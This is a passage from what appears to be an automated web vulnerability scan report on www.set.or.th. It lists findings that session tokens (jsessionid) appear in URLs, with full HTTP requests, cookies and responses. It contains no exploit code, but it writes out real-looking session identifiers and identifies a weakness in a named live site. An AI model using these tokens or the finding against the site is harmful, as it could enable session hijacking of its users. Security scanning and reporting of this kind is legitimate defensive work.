User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.235.61
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 0


12.29. http://www.set.or.th/highlight/release_en_US.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /highlight/release_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /highlight/release_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/info_en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:26 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:01 GMT
ETag: "134ed6-12ca-63744640"
Accept-Ranges: bytes
Content-Length: 4810
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="j
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=380ED0E35F1A7A494FEE56E070EEBDCE?type=R&amp;time=1304426269000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&amp;source=SET&amp;headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET News :Thai bourse launches &#034;Financial Freedom Academy Project&#034; on www.settrade.com [03/05/11]</a>
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=380ED0E35F1A7A494FEE56E070EEBDCE?type=R&amp;time=1304426046000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&amp;source=SET&amp;headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET News :Thai bourse to promote brokerage firms&#039; full range of services [03/05/11]</a>
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=380ED0E35F1A7A494FEE56E070EEBDCE?type=R&amp;time=1304399591000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&amp;source=SET&amp;headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">TFEX News :(correction) TFEX news : Thai bourse to trades silver futures on June 20 and to... [03/05/11]</a>
...[SNIP]...

12.30. http://www.set.or.th/set/images/bg-body.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/bg-body.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:09 GMT
Server: Apache-Coyote/1.1
ETag: W/"188-1295397878000"
Last-Modified: Wed, 19 Jan 2011 00:44:38 GMT
Content-Type: image/gif
Content-Length: 188

GIF89a..I....................................................................................................!.......,......I...9 ...@...$..HL...Q8. .T....pH,....r.l:...tJ.Z...v..z.......;

12.31. http://www.set.or.th/set/images/button-orange.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/button-orange.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/button-orange.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:58 GMT
Server: Apache-Coyote/1.1
ETag: W/"657-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: image/gif
Content-Length: 657

GIF89a............b....................... ..........y.....s...........h...........w,..[.o.....|.........r.......................3..+.....M..    ..+.....
.h..............b..l.............................
...[SNIP]...

12.32. http://www.set.or.th/set/images/email-setcallcenter.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/email-setcallcenter.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/email-setcallcenter.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:04 GMT
Server: Apache-Coyote/1.1
ETag: W/"228-1295397884000"
Last-Modified: Wed, 19 Jan 2011 00:44:44 GMT
Content-Type: image/gif
Content-Length: 228

GIF89ax............!.......,....x........................H.....
..{..!.4......].....B(....d..4Rv
g.Ht,....w.V..r...m.`........Q.\..Ifc...DEV4G.(.....w..x....Xi.t..8...)...I4..
he..X*.*.......h.....I..
...[SNIP]...

12.33. http://www.set.or.th/set/images/icon-Avi.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/icon-Avi.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/icon-Avi.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache-Coyote/1.1
ETag: W/"400-1295397890000"
Last-Modified: Wed, 19 Jan 2011 00:44:50 GMT
Content-Type: image/gif
Content-Length: 400

GIF89a.....?...,............jk.....N%......x.....q....v............UU.khb...'0.+y..........\..Vx........E.g..tx......b....._...........f{a..c..Z.]^_.Qm..z....=X B..w..8N.y...`.......p.2q........qqq.
...[SNIP]...

12.34. http://www.set.or.th/set/images/icon-print-en01.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/icon-print-en01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/icon-print-en01.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:57 GMT
Server: Apache-Coyote/1.1
ETag: W/"303-1295397890000"
Last-Modified: Wed, 19 Jan 2011 00:44:50 GMT
Content-Type: image/gif
Content-Length: 303

GIF89a;......?_.......___..?..........................._._.....??_.V.....................................!.......,....;...... %.di.h..l..p,.t.FB..v.
...+
)..n@4...D.69UmP..!u^g...$.H.........o.@.
...[SNIP]...

12.35. http://www.set.or.th/set/images/icon-thai01.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/icon-thai01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/icon-thai01.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache-Coyote/1.1
ETag: W/"162-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: image/gif
Content-Length: 162

GIF89a9.......V..........!.......,....9.....s...........3....t"H
bW.&`.^.n...q..[..._..|+..W..t.a2.*......Zju.#B8.F.U......e.Xh%~.ie....oV....A..H1X..........P..;

12.36. http://www.set.or.th/set/images/leftbox-top.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/leftbox-top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/leftbox-top.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:01 GMT
Server: Apache-Coyote/1.1
ETag: W/"105-1295397884000"
Last-Modified: Wed, 19 Jan 2011 00:44:44 GMT
Content-Type: image/gif
Content-Length: 105

GIF89a..    ..........!.......,......    ...@..............{...H.f.......Gj....O3........Q"...L_r..Ja...J....;

12.37. http://www.set.or.th/set/images/middlebox-bgtop.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-bgtop.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-bgtop.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:10 GMT
Server: Apache-Coyote/1.1
ETag: W/"170-1295397884000"
Last-Modified: Wed, 19 Jan 2011 00:44:44 GMT
Content-Type: image/gif
Content-Length: 170

GIF89a.....................&.............................5.. ..F..)..........................................!.......,..........'.$M..9N.=...p.+. ,K. .a4.#.....B.. .H!.;

12.38. http://www.set.or.th/set/images/middlebox-bottom-bg.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-bottom-bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-bottom-bg.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:10 GMT
Server: Apache-Coyote/1.1
ETag: W/"818-1295397878000"
Last-Modified: Wed, 19 Jan 2011 00:44:38 GMT
Content-Type: image/gif
Content-Length: 818

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.39. http://www.set.or.th/set/images/middlebox-bottomleft.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-bottomleft.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-bottomleft.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache-Coyote/1.1
ETag: W/"880-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: image/gif
Content-Length: 880

GIF89a
.................................................................................................................................................................................................
...[SNIP]...

12.40. http://www.set.or.th/set/images/middlebox-bottomright.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-bottomright.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-bottomright.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:09 GMT
Server: Apache-Coyote/1.1
ETag: W/"886-1295397878000"
Last-Modified: Wed, 19 Jan 2011 00:44:38 GMT
Content-Type: image/gif
Content-Length: 886

GIF89a
.................................................................................................................................................................................................
...[SNIP]...

12.41. http://www.set.or.th/set/images/middlebox-topleft.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-topleft.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-topleft.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:02 GMT
Server: Apache-Coyote/1.1
ETag: W/"663-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: image/gif
Content-Length: 663

GIF89a
....v...............&..2..6..!...........H..7....."..&..,..0..*..>..G..F..8.....-.....&.....'..4..%..'........'.....0.....D...........<..>..K..%..!........ ..-..3..9..-..9...../..X.. ........C.
...[SNIP]...

12.42. http://www.set.or.th/set/images/middlebox-topright.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/middlebox-topright.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/middlebox-topright.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:02 GMT
Server: Apache-Coyote/1.1
ETag: W/"660-1295397878000"
Last-Modified: Wed, 19 Jan 2011 00:44:38 GMT
Content-Type: image/gif
Content-Length: 660

GIF89a
....u...............&..2..6..!...........H..7....."..&..,..0..*..>..G..F..8.....-.....&..'..4..%..'........'.....0.....D........<..>..K..%..!........ ..-..3..9..-..9...../.. ..C..+.....$.......
...[SNIP]...

12.43. http://www.set.or.th/set/images/rightbox-top.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/rightbox-top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/rightbox-top.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:59 GMT
Server: Apache-Coyote/1.1
ETag: W/"134-1295397880000"
Last-Modified: Wed, 19 Jan 2011 00:44:40 GMT
Content-Type: image/gif
Content-Length: 134

GIF89a..
............................!.......,......
...KH...0.I..8...[`(.^i.h..c..p,....u...u...p..1....b|-.Pd...Zs.A......A.K.g....;

12.44. http://www.set.or.th/set/images/rss.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/rss.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/rss.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:06 GMT
Server: Apache-Coyote/1.1
ETag: W/"458-1295397880000"
Last-Modified: Wed, 19 Jan 2011 00:44:40 GMT
Content-Type: image/gif
Content-Length: 458

GIF89a.....?...4....|...-..U.U
.....5........g.....Z....k
.|6....m)....._.t..-.....|.tF.lC.b.....m..r.....vF.rE....d..e.qB..H........t.j..yK..B..>.a...q....oA..q.uB..&.......n?..8.d..i..^......7....
...[SNIP]...

12.45. http://www.set.or.th/set/images/spacer.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/images/spacer.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/images/spacer.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:03 GMT
Server: Apache-Coyote/1.1
ETag: W/"67-1295397890000"
Last-Modified: Wed, 19 Jan 2011 00:44:50 GMT
Content-Type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.46. http://www.set.or.th/set/javascripts/javascript.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/javascripts/javascript.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/javascripts/javascript.js;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
